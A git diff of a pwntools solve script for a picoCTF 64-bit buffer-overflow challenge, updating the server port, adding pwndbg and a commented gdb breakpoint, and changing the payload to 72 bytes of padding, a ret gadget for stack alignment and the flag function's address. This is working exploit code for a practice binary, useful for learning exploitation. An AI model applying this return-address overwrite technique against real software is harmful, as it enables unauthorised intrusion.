diff --git a/pwn/x_sixty_what/solve.py b/pwn/x_sixty_what/solve.py
index 999e418..6e1c6e3 100755
--- a/pwn/x_sixty_what/solve.py
+++ b/pwn/x_sixty_what/solve.py
@@ -1,5 +1,5 @@
 #!/usr/bin/env nix-shell
-#!nix-shell -p python3 -i python3 python3Packages.pwntools
+#!nix-shell -p python3 -i python3 (python3Packages.pwntools.override{debugger=pwndbg;})
 
 from pwn import *
 
@@ -7,7 +7,7 @@ exe = ELF("./vuln")
 
 context.binary = exe
 
-ADDR, PORT, *_ = "saturn.picoctf.net 63864".split()
+ADDR, PORT, *_ = "saturn.picoctf.net 52789".split()
 
 def conn():
     if args.REMOTE:
@@ -20,11 +20,17 @@ def conn():
 def main():
   r = conn()
 
+  # gdb.attach(r, '''
+  #   b *(vuln+29)
+  #   c
+  # ''')
+
   print(r.recvuntil(b"Welcome to 64-bit. Give me a string that gets you the flag:"))
   offset = 72 # found with pwndbg
-  print(f"flag: {hex(exe.sym.flag)}")
   print(p64(exe.sym.flag))
-  payload = b'A' * offset + p64(exe.sym.flag + 5) # skip one instruction for some reason...
+  # NOTE: extra ret gadget is needed to align the stack.
+  #       Alternatively, we could ret to (exe.sym.flag + 5)
+  payload = b'A' * offset + p64(ROP(exe).ret.address) + p64(exe.sym.flag)
   r.sendline(payload)
   print(r.recvall())
   r.close()